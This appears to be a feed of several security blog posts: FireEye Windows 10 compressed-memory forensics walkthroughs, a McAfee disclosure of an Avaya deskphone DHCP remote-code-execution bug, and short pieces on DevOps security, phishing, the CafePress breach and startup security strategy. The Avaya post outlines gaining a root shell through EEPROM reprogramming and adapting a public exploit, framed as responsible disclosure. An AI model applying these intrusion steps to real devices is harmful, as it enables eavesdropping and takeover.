This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk with the series title and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort of analyzing undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots ultimately using tools which must recreate the job of an API by manually parsing and traversing structures and reimplementing algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).


Figure 1: Call to RtlDecompressBuferEx, note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).


Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

0x20101000

0x1163

0x31001200

0x1423

0x20001400

“Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.


Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is usedto perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.


Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.


Figure 6: Structure definition found within w10_memcompression.py overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both Volatily and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine.  A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.


Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.


Figure 2: Locating and viewing the marker page from the kernel debugger

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index in to nt!MmPagingFile (see Figure 3).


Figure 3: PTE of a compressed page in the virtual store an confirmation of virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.


Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note, that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure or nt!SmGlobals needs to be located. This is a straightforward process if symbols are available (see Figure 5).


Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.


Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure) we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index in to the pointer array is the result of dividing the retrieved store index by 32, while the second one is the remainder of the division operation. In our case both indices are 0 and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, will be placed in stores from 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.


Figure 7: Dumping the SMKM_STORE structure

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.


Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete we found that our chunk key is 4b02d. Since it’s a compound value we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, and the offset within the located chunk. The decoding involves four additional SHMP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.


Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.


Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.


Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1709 x64. The same techniques used here can be applied to Windows 10 1607 and onwards assuming correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.

Resources

Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware

Avaya is the second largest VOIP solution provider (source) with an install base covering 90% of the Fortune 100 companies (source), with products targeting a wide spectrum of customers, from small business and midmarket, to large corporations. As part of the ongoing McAfee Advanced Threat Research effort into researching critical vulnerabilities in widely deployed software and hardware, we decided to have a look at the Avaya 9600 series IP Deskphone. We were able to find the presence of a Remote Code Execution (RCE) vulnerability in a piece of open source software that Avaya likely copied and modified 10 years ago, and then failed to apply subsequent security patches to. The bug affecting the open source software was reported in 2009, yet its presence in the phone’s firmware remained unnoticed until now. Only the H.323 software stack is affected (as opposed to the SIP stack that can also be used with these phones), and the Avaya Security Advisory (ASA) can be found here ASA-2019-128.

The video below demonstrates how an attacker can leverage this bug to take over the normal operation of the phone, exfiltrate audio from its speaker phone, and potentially “bug” the phone. The current attack is conducted with the phone directly connected to an attacker’s laptop but would also work via a connection to the same network as a vulnerable phone. The full technical details can be found here, while the rest of this article will give a high-level overview on how this bug was found and some consideration regarding its resolution. The firmware image Avaya published on June 25th resolves the issue and can be found here. As a user, you can verify if your Deskphone is vulnerable: first determine if you have one of the affected models (9600 Series, J100 Series or B189), then you can find which firmware version your phone is using in the “About Avaya IP Deskphone” screen under the Home menu, version 6.8.1 and earlier are vulnerable when using a H.323 firmware (SIP versions are not affected).

What are Researchers Looking for?

When studying the security of embedded and IoT devices, researchers generally have a couple of goals in mind to help kickstart their research. In most cases, two of the main targets are recovering the files on the system so as to study how the device functions, and then finding a way to interact directly with the system in a privileged fashion (beyond what a normal user should be able to do). The two can be intertwined, for instance getting a privileged access to the system can enable a researcher to recover the files stored on it, while recovering the files first can show how to enable a privileged access.

In this case, recovering the files was straightforward, but gaining a privileged access required a little more patience.

Recovering the Files From the Phone

When we say recovering the files from the phone, we mean looking for the operating system and the various pieces of software running on it. User files, e.g. contacts, settings and call logs, are usually not of interest to a security researcher and will not be covered here. To recover the files, the easiest approach is to look for firmware updates for the device. If we are lucky, they will be freely available and not encrypted. In most cases, an encrypted firmware does not increase the security of the system but rather raises the barrier of entry for security researchers and attackers alike. In this case, we are in luck, Avaya’s website serves firmware updates for its various phone product lines and anyone can download them. The download contains multiple tar files (a type of archive file format). We can then run a tool called binwalk on the extracted files. Binwalk is a large dictionary of patterns that represents known file formats; given an unknown firmware file, it will look for any known pattern and, upon finding potential matches, will attempt to process them accordingly. For instance, if it finds what looks like a .zip file inside the firmware, it will try to unzip it. Running this tool is always a good first step when facing an unknown firmware file as, in most cases, it will identify useful items for you.

When processing the phone’s firmware, extracting the files and running binwalk on them gave us the program the phone runs at startup (the bootloader), the Linux kernel used by the phone, and a JFFS filesystem that contains all the phone’s binaries and configuration files. This is a great start, as from there we can start understanding the inner workings of the device and look for bugs.  At this stage however, we are limited to performing a static analysis: we can look at the files and peek at the assembly instructions of various binaries, but we cannot execute them. To make life easier, there are usually two options. The first one is to emulate the whole phone, or at least some region of interest, while the other is to get a privileged access to the system, to inspect what is running on it as well as run debugging tools. Best results come when you mix and match all these options appropriately. For the sake of simplicity, we will only cover the latter, but both were used in various ways to help us in our research.

Getting the Privileged Access

In most cases, when talking about gaining privileged access to an IoT/embedded device, security researchers are on the lookout for an administrative interface called a root shell that lets them execute any code they want with the highest level of privilege. Sometimes, one is readily available for maintenance purposes; other times more effort is required to gain access to it, assuming one is present in the first place. This is when hardware hacking comes into play; security researchers love to rip open devices and void warranties, looking for potential debug ports, gatekeepers of the sought-after privileged access.

Close up of the phone’s circuit board. UART ports in Red and the EEPROM in blue

In the picture above, we can see two debug ports labeled UART0 and UART1. This type of test point, where the copper is directly exposed, is commonly used during the manufacturing process to program the device or verify everything is working properly. UART stands for Universal Asynchronous Receiver-Transmitter and is meant for two-way communication. This is the most likely place where we can find the administrative access we are looking for. By buying a $15 cable that converts UART to USB and soldering wires onto the test pads, we can see debug information being printed on screen when the phone boots up, but soon the flow of debug information dries up. This is a curious behavior—why stop the debug messages?—so we need to investigate more. By using a disassembler to convert raw bytes into computer instructions, we can peek into the code of the bootloader recovered earlier and find out that during the boot process the phone fetches settings from external memory to decide whether the full set of debug features should be enabled on the serial console. The external memory is called an EEPROM and is easily identifiable on the board, first by its shape and then by the label printed on it. Labels on electronic components are used to identify them and to retrieve their associated datasheet, the technical documentation describing how to use the chip from an electrical engineering standpoint. Soldering wires directly to the chip under a microscope, and connecting it to a programmer (a $30 gizmo called a buspirate), allows us to change the configuration stored on it and enable the debug capabilities of the phone.

EEPROM ready to be re-programmed

Rebooting the phones gives us much more debug information and, eventually, we are greeted with the root shell we were after.

Confirmation we have a root shell. Unrelated debug messages are being printed while we are invoking the “whoami” command

Alternative Roads

The approach described above is fairly lengthy and is only interesting to security researchers in a similar situation. A more generic technique would be to directly modify the filesystem by altering the flash storage (a NAND Flash on the back of the circuit board) as we did for previous research, and then automatically start an SSH server or a remote shell. Another common technique is to tamper with the NAND flash while the filesystem is loading in memory, to get the bootloader in an exception state that will then allow the researcher to modify the boot arguments of the Linux kernel. Otherwise, to get remote shell access, using an older firmware with known RCE vulnerabilities is probably the easiest method to consider; it can be a good starting point for security researchers and is not threatening to regular users as they should already have the most up-to-date software. All things considered, these methods are not a risk to end-users and are more of a stepping stone for security researchers to conduct their research.

In Search of Vulnerabilities

After gaining access to a root shell and the ability to reverse engineer the files on the phone, we are faced with the open-ended task to look for potentially vulnerable software. As the phone runs Linux, the usual command line utilities people use for administering Linux systems are readily available to us. It is natural to look at the list of processes running, find the ones having network connection and so forth. While poking around, it becomes clear that one of the utilities, dhclient, is of great interest. It is already running on the system and handles network configuration (the so-called DHCP requests to configure the phone’s IP address). If we invoke it in the command line, the following is printed:

Showing a detailed help screen describing its expected arguments is normal behavior, but a 2004-2007 copyright is a big red flag. A quick search confirms that the 4.0.0 version is more than 10 years old and, even worse, an exploit targeting it is publicly available. Dhclient code is open source, so finding the differences between two successive version is straightforward. Studying the exploit code and how the bug was patched helps us to narrow down which part of the code could be vulnerable. By once again using a disassembler, we confirm the phone’s version of dhclient is indeed vulnerable to the bug reported in 2009. Converting the original exploit to make it work on the phone requires a day or two of work, while building the proof of concept demonstrated in the above video is a matter of mere hours. Indeed, all the tools to stream audio from the phone to a separate machine are already present on the system, which greatly reduces the effort to create this demo. We did not push the exploitation further than the Proof of Concept shown in the above video, but we can assume that at this point, building a weaponized version able to threaten private networks is more of a software engineering task and a skilled attacker might only need a few weeks, if not days, to put one together.

Remediation

Upon finding the flaw, we immediately notified Avaya with detailed instructions on how to reproduce the bug and suggested fixes. They were able to fix, test and release a patched firmware image in approximately two months. At the time of publication, the fix will have been out for more than 30 days, leaving IT administrators ample time to deploy the new image. In a large enterprise setting, it is pretty common to first have a testing phase where a new image is being deployed to selected devices to ensure no conflict arises from the deployment. This explains why the timeline from the patch release to deployment to the whole fleet may take longer than what is typical in consumer grade software.

Conclusion

IoT and embedded devices tend to blend into our environment, in some cases not warranting a second thought about the security and privacy risks they pose. In this case, with a minimal hardware investment and free software, we were able to uncover a critical bug that remained out-of-sight for more than a decade. Avaya was prompt to fix the problem and the threat this bug poses is now mitigated, but it is important to realize this is not an isolated case and many devices across multiple industries still run legacy code more than a decade old. From a system administration perspective, it is important to consider all these networked devices as tiny black-box computers running unmanaged code which should be isolated and monitored accordingly. The McAfee Network Security Platform (NSP) detects this attack as “DHCP: Subnet Mask Option Length Overflow” (signature ID: 0x42601100), ensuring our customers remain protected. Finally, for the technology enthusiasts reading this, the barrier of entry to hardware hacking has never been this low, with plenty of online resources and cheap hardware to get started. Looking for this type of vulnerability is a great entry point to information security and will help make the embedded world a safer place.

The post Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware appeared first on McAfee Blogs.

Live From Black Hat USA: The Inevitable Marriage of DevOps & Security

During her briefing with Kelly Shortridge, vice president of product strategy at Capsule8, Dr. Nicole Forsgren, research and strategy at Google, did a beautiful job of adding imagery to the story she told of the attendee reactions during the now-famous talk Paul Hammond and John Allspaw gave at Velocity in 2009. If you're not familiar, the title of said talk was, "10 Deploys Per Day: Dev & Ops Cooperation at Flickr."

Forsgren recalled that, "The room was split. At the end of this process, large pieces of code would be deployed and, basically, lit everyone on fire. Half the room was amazed and it was changing the world. Half of the room said they were monsters and how dare they light people on fire 10 times per day." Forsgren concluded that "DevOps has crossed the chasm - the business benefits are too striking. We see most of the industry doing this. There is no turning the ship around."

Indeed, DevOps has long moved beyond the conceptual and has become a widely adopted practice in software development and delivery. It gave birth to the InfoSec equivalent of DevSecOps and the concept of "shifting security left." From where I sit within Veracode, I see the ways that many security solutions providers are doing their best to provide developers with the tools they need to embed security into their workflow, yet it’s clear that there is still more to be done to get InfoSec professionals on board.

"James Wickett has said the ratio of engineers in development, operations, and InfoSec in a typical technology organization is 100:10:1. If we integrate [InfoSec professionals] earlier to have input, the shift left can build a more collaborative culture, contribute to amazing outcomes - like stability, reliability, and resiliency," Forsgren said. "We need to build secure systems, and we will find ways to do this. We know this is super important, and security is the next frontier. Security can contribute to this and join DevOps. Or you can stand aside as DevOps figures this out and carves its own path. I would love to see InfoSec contributing the expertise we just don't have."

Forsgren was clearly echoing the sentiment Dino Dai Zovi expressed in his conference keynote. Certainly, the concept of being lit on fire 10 times per day would create a fight-or-flight response, and it is much easier to go to no than to go to yes. Yet, when Forsgren spoke about the benefits of this type of work, she explained that what InfoSec pros would face would be mini-fires with a smaller blast radius. She argues that it is time for InfoSec to say, "no, and…"

The Security of Chaos

It appeared that Shortridge couldn't have agreed more.

"The real DevOps will be held accountable for security fixes," said Shortridge. "So what should goals and outcomes become? Why should InfoSec and DevOps goals diverge? InfoSec should support innovation in the face of change - not add friction. InfoSec has arguably failed, so 'this is how we've always done it' is invalid. The greatest advances in security are rarely spawned by the security industry."

In other words, it's time to start jumping out of the proverbial planes in order to face our fears and start doing things differently in security. Shortridge reminded us that it is inevitable that things will fail and things will be pwned, which is why she is a proponent of adopting chaos engineering. Chaos engineering is the discipline of experimenting on a software system in production to provide your organization with a level of confidence in the system's capability to withstand turbulent and unexpected conditions, while still creating adequate quality of service (resiliency) during difficult times.

The concept of chaos engineering was created while Greg Orzell was overseeing Netflix's migration to the cloud in 2011. He wanted to address the lack of adequate resilience by creating a tool that would cause breakdowns in their production environment - the one used by Netflix customers. In doing this, the team could move from a development model that assumed no breakdowns to one where they were considered inevitable. This encouraged developers to build resilience into their software from the start. By regularly "killing" random instances of software service, they could test redundant architecture to make sure that a server failure wouldn't noticeably impact the customer experience.

"Expect your security controls will fail and prepare accordingly. System architectures must be designed assuming the controls and users will fail," she said. "Users very rarely follow the ideal behaviors. Don’t try to avoid incidents. Embrace your ability to respond to them. Ensure that your systems are resilient enough to handle incidents gracefully. Pivot toward realistic resilience."

If your team can plan for nothing but the chaos factor, then you should understand that there are true benefits to applying chaos resilience, including lower remediation costs, decreased stress levels during real incidents, and less burnout.

"Incidents are a problem with known processes, rather than fear and uncertainty. It creates feedback loops to foster understanding of systemic risk. Chaos engineering does this to help us continuously refine security strategy - essentially all the time red teaming. You have the ability to automate the toil, or the manual, repetitive, tactical work that doesn't provide enduring value," she said.

How to Marry DevOps and Security

At the end of the talk, Forsgren offered these tenants for a scalable love between DevOps and Security:

  1. Sit in on early design decisions and demos – but say “No, and…” vs. “No.”
  2. Provide input on tests so every testing suite has InfoSec’s stamp on it.
  3. By the last “no” gate in the delivery process, nearly all issues will be fixed.
  4. InfoSec should focus on outcomes that are aligned with business goals.
  5. Time To Remediate (TTR) should become the preliminary anchor of your security metrics.
  6. Security- and performance-related gamedays can’t be separate species.
  7. Cultivate buy-in together for resilience and chaos engineering.
  8. Visibility/observability: collecting system information is essential.
  9. Your DevOps colleagues are likely already collecting the data you need - work with them to collect it.
  10. Changing culture: change what people do, not what they think.

Forsgren and Shortridge made the case that security cannot force itself into DevOps, it must marry it - and have an equal partnership. Chaos/resilience are natural homes for InfoSec and represent its future, and InfoSec will need to evolve to unify responsibility and accountability.

"If not, InfoSec will sit at the kids’ table until it is uninvited from the business," Shortridge said. "Giving up control isn’t a harbinger of doom. Resilience is a beacon of hope."

Stay tuned for more from Black Hat …

Understanding why phishing attacks are so effective and how to mitigate them

Elie Bursztein, Security & Anti-abuse Research Lead, Daniela Oliveira, Professor at the University of Florida




Phishing attacks continue to be one of the common forms of account compromise threats. Every day, Gmail blocks more than 100 million phishing emails and Google Safe Browsing helps protect more than 4 billion devices against dangerous sites. 


As part of our ongoing efforts to further protect users from phishing, we’re partnering with  Daniela Oliveira from the University of Florida during a talk at Black Hat 2019 to explore the reasons why social engineering attacks remain effective phishing tactics, even though they have been around for decades.



Overall, the research finds there are a few key factors that make phishing an effective attack vector:
  • Phishing is constantly evolving: 68% of the phishing emails blocked by Gmail today are new variations that were never seen before. This fast pace adversarial evolution requires humans and machines to adapt very quickly to prevent them.
  • Phishing is targeted:  Many of the campaigns targeting Gmail end-users and enterprise consumers only target a few dozen individuals. Enterprise users being 4.8x more targeted than end-users.
  • Phishers are persuasion experts: As highlighted by Daniela’s research with Natalie Ebner et al. at the University of Florida, phishers have mastered the use of persuasion techniques, emotional salience and  gain or loss framing to trick users into reacting to phishing emails.
  • 45% of users don’t understand what phishing is: After surveying Internet users, we found that 45% of them do not  understand what phishing is or the risk associated with it. This lack of awareness increases the risk of being phished and potentially hinders the adoption of 2-step verification. 


Protecting users against phishing requires a layered defense approach that includes:
  • Educating users about phishing so they understand what it is, how to detect it and how to protect themselves.
  • Leveraging the recent advances in AI to build robust phishing detections that can keep pace with fast  evolving phishing campaigns.
  • Displaying actionable phishing warnings that are easy to understand by users so they know how to react when they see them.
  • Using strong two factor authentication makes it more difficult  for phishers to compromise accounts. Two-factor technologies, as visible in the graph above, can be effective against the various forms of phishing, which highlights the importance of driving awareness and adoption among users.  
While technologies to help mitigate phishing exist, such as FIDO standard security keys, there is still work to be done to help users increase awareness understand how to protect themselves against phishing.

23M CafePress Accounts Compromised: Here’s How You Can Stay Secure

You’ve probably heard of CafePress, a custom T-shirt and merchandise company allowing users to create their own unique apparel and gifts. With a plethora of users looking to make their own creative swag, it’s no surprise that the company was recently targeted in a cybercriminal ploy. According to Forbes, CafePress experienced a data breach back in February that exposed over 23 million records including unique email addresses, names, physical addresses, phone numbers, and passwords.

How exactly did this breach occur? While this information is still a bit unclear, security researcher Jim Scott stated that approximately half of the breached passwords had been exposed through gaps in an encryption method called base64 SHA1. As a result, the breach database service HaveIBeenPwned sent out an email notification to those affected letting them know that their information had been compromised. According to Engadget, about 77% of the email addresses in the breach have shown up in previous breach alerts on HaveIBeenPwned.

Scott stated that those who used CafePress through third-party applications like Facebook or Amazon did not have their passwords compromised. And even though third-party platform users are safe from this breach, this isn’t always the case. With data breaches becoming more common, it’s important for users to protect their information as best as they can. Check out the following tips to help users defend their data:

  • Check to see if you’ve been affected. If you know you’ve made purchases through CafePress recently, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 23M CafePress Accounts Compromised: Here’s How You Can Stay Secure appeared first on McAfee Blogs.

7 Steps to Building a Cybersecurity Strategy from Scratch

When your organization is young and growing, you may find yourself overwhelmed with a never-ending to-do list.  It can be easy to overlook security when you’re hiring new employees, finding infrastructure, and adopting policies.  Without a proper cybersecurity strategy, however, the business that you’ve put your heart and soul into, or the brilliant idea that you’ve spent years bringing to life, are on the line. Every year, businesses face significant financial, brand, and reputational damage resulting from a data breach, and many small businesses don’t ever recover.

Not only that, but as you grow you may be looking to gain investors or strategic partners.  Many of these firms are not willing to give organizations that don’t take security seriously a chance. A strong security stance can be your differentiator among your customers and within the Venture Capital landscape.

One thing’s for sure: you’ve spent a great deal of time creating a business of your own, so why throw it all away by neglecting your security?  You can begin building your own cybersecurity strategy by following these steps:

1.  Start by identifying your greatest business needs.

This understanding is critical when determining how your vulnerabilities could affect your organization.  Possible business needs could include manufacturing, developing software, or gaining new customers. Make a list of your most important business priorities.

2.  Conduct a third-party security assessment to identify and remediate the greatest vulnerabilities to your business needs.

 The assessment should evaluate your organization’s overall security posture, as well as the security of your partners and contractors.

Once you understand the greatest risks to your business needs, you can prioritize your efforts and budget based on ways to remediate these.

3.  Engage a Network Specialist to set-up a secure network or review your existing network.

A properly designed and configured network can help prevent unwanted users from getting into your environment and is a bare necessity when protecting your sensitive data.

Don’t have a set office space?  If you and your team are working from home or communal office spaces, be sure to never conduct sensitive business on a shared network.

4.  Implement onboarding (and offboarding) policies to combat insider threat, including a third-party vendor risk management assessment.

 Your team is your first line of defense, but as you grow, managing the risk of bringing on more employees can be challenging.  Whether attempting to maliciously steal data or clicking a bad link unknowingly, employees pose great threats to organizations.

As part of your onboarding policy, be sure to conduct thorough background checks and monitor users’ access privileges.  This goes for your employees, as well as any third parties and contractors you bring on.

5.  Implement a security awareness training program and take steps to make security awareness part of your company culture.

Make sure your training program includes topics such as password best practices, phishing identification and secure travel training.  Keep in mind, though, that company-wide security awareness should be more than once-a-year training.  Instead, focus on fostering a culture of cybersecurity awareness.

6.  Set-up multi-factor authentication and anti-phishing measures.

Technology should simplify your security initiatives, not complicate them.  Reduce the number of administrative notifications to only what is necessary and consider improvements that don’t necessarily require memorizing more passwords, such as password managers and multi-factor authentication for access to business-critical data.

7.  Monitor your data and endpoints continuously with a Managed Security Services Provider.

As you grow, so does the amount of endpoints you have to manage and data you have to protect. One of the best ways to truly ensure this data is protected is to have analysts monitoring your data at all hours. A managed security services provider will monitor your data through a 24/7 security operations center, keeping eyes out for any suspicious activity such as: phishing emails, malicious sites, and any unusual network activity.

You’re not done yet: revisit your security strategy as you evolve.  

It’s important to remember that effective cybersecurity strategies vary among organizations. As you grow, you’ll want to consider performing regular penetration testing and implementing an Incident Response Plan.  

And, as your business changes, you must continually reassess your security strategy and threat landscape.

For more information, get the Comprehensive Guide to Building a Cybersecurity Strategy from Scratch.

The post 7 Steps to Building a Cybersecurity Strategy from Scratch appeared first on GRA Quantum.

Chinese cyberhackers ‘blurring line between state power and crime’

Cybersecurity firm FireEye says ‘aggressive’ APT41 group working for Beijing is also hacking video games to make money

